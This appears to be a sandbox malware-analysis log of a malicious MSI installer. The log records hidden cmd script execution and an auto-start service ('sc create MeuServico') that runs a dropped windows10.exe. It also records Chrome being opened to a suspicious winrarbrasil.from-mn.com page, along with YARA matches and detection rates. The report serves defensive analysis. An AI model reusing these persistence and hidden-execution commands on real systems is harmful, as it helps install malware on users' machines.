Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 73BF0000 page read and write
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\6450d8.msi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI55AB.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5723.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5762.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5783.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5820.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\SourceHash{5DF9F6C2-148A-4336-9D2A-77B6884D39DA}
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI594A.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5DCF.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI5DEF.tmp
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI55AB.tmp
Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B06078 | 3_2_00B06078
Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00ADD060 | 3_2_00ADD060
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0B3363_2_00B0B336
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B146093_2_00B14609
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF97303_2_00AF9730
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AFF7003_2_00AFF700
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B038A03_2_00B038A0
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B018EF3_2_00B018EF
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0E9193_2_00B0E919
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AFFA8E3_2_00AFFA8E
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0DB303_2_00B0DB30
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AE0E903_2_00AE0E90
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B160784_2_00B16078
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00AED0604_2_00AED060
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1B3364_2_00B1B336
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B246094_2_00B24609
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B097304_2_00B09730
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B0F7004_2_00B0F700
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B138A04_2_00B138A0
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B118EF4_2_00B118EF
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1E9194_2_00B1E919
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B0FA8E4_2_00B0FA8E
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1DB304_2_00B1DB30
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00AF0E904_2_00AF0E90
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BBD9E05_2_00BBD9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BA2AA05_2_00BA2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BAA2CD5_2_00BAA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BA5A345_2_00BA5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00BA9F4D5_2_00BA9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00CBCC9A5_2_00CBCC9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00FB6BAC5_2_00FB6BAC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C2671016_2_00C26710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B5A2CD16_2_00B5A2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C3741016_2_00C37410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B946B016_2_00B946B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B6D9E016_2_00B6D9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B52AA016_2_00B52AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B55A3416_2_00B55A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C19F6C16_2_00C19F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00B59F4D16_2_00B59F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_009AFD4016_2_009AFD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0097B5B816_2_0097B5B8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C6CC9A16_2_00C6CC9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C83B8816_2_00C83B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00C7EB1C16_2_00C7EB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00D4719A16_2_00D4719A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_00D4754916_2_00D47549
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0104024916_2_01040249
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0103F55016_2_0103F550
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0104078116_2_01040781
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_010417BC16_2_010417BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0103F1DF16_2_0103F1DF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0103F8EF16_2_0103F8EF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_0092FD4017_2_0092FD40
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BA671017_2_00BA6710
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00ADA2CD17_2_00ADA2CD
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BB741017_2_00BB7410
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00B146B017_2_00B146B0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AED9E017_2_00AED9E0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AD2AA017_2_00AD2AA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AD5A3417_2_00AD5A34
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00B99F6C17_2_00B99F6C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00AD9F4D17_2_00AD9F4D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_008FB5B817_2_008FB5B8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00C03B8817_2_00C03B88
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BFEB1C17_2_00BFEB1C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00BECC9A17_2_00BECC9A
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FBF8EF17_2_00FBF8EF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FBF1DF17_2_00FBF1DF
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FC17BC17_2_00FC17BC
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FC078117_2_00FC0781
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FBF55017_2_00FBF550
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_00FC024917_2_00FC0249
            Source: Joe Sandbox ViewDropped File: C:\Users\user\Pictures\fotosdaviagem\windows10.exe 585741CA3C4041BB39D107F1F159D908650967FBCCAC3A491BCA389CC4BA0769
            Source: Joe Sandbox ViewDropped File: C:\Windows\Installer\MSI55AB.tmp 42EF18C42FE06709F3C86157E2270358F3C93D14BE2E173B8FAE8EDCEFDDFCA0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: String function: 00BFC298 appears 36 times
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: String function: 00C7C298 appears 36 times
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: String function: 00AF8213 appears 100 times
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: String function: 00AF85D0 appears 39 times
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: String function: 00AF8246 appears 67 times
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: String function: 00B08213 appears 100 times
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: String function: 00B085D0 appears 39 times
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: String function: 00B08246 appears 67 times
            Source: StarBurn.dll.1.drStatic PE information: Number of sections : 13 > 10
            Source: CrzA2u67LQ.msiBinary or memory string: OriginalFilenameviewer.exeF vs CrzA2u67LQ.msi
            Source: CrzA2u67LQ.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs CrzA2u67LQ.msi
            Source: windows10.exe, 0000000C.00000002.2083044176.0000000001CF0000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: ^.VbP'
            Source: classification engineClassification label: mal40.evad.winMSI@60/37@6/8
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD61D0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,3_2_00AD61D0
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD6EE0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,LocalFree,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,3_2_00AD6EE0
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD1D70 LoadResource,LockResource,SizeofResource,3_2_00AD1D70
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML5A2F.tmpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
            Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI44f71.LOGJump to behavior
            Source: Yara matchFile source: 0000001A.00000002.4175519677.0000000000951000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.4174825409.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.4175193752.0000000000981000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4175517301.0000000000911000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4164202689.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4177483806.0000000000971000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2046975605.00000000008D1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.4174481109.0000000000901000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.4175775360.00000000009C1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Windows\Installer\MSI5DCF.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: CrzA2u67LQ.msiVirustotal: Detection: 26%
            Source: CrzA2u67LQ.msiReversingLabs: Detection: 31%
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: windows10.exeString found in binary or memory: <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\CrzA2u67LQ.msi"
            Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DEF.tmp "C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start MeuServico
            Source: unknownProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe C:\Users\user\Pictures\fotosdaviagem\windows10.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe  Process created: C:\Users\user\Pictures\fotosdaviagem\windows10.exe "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
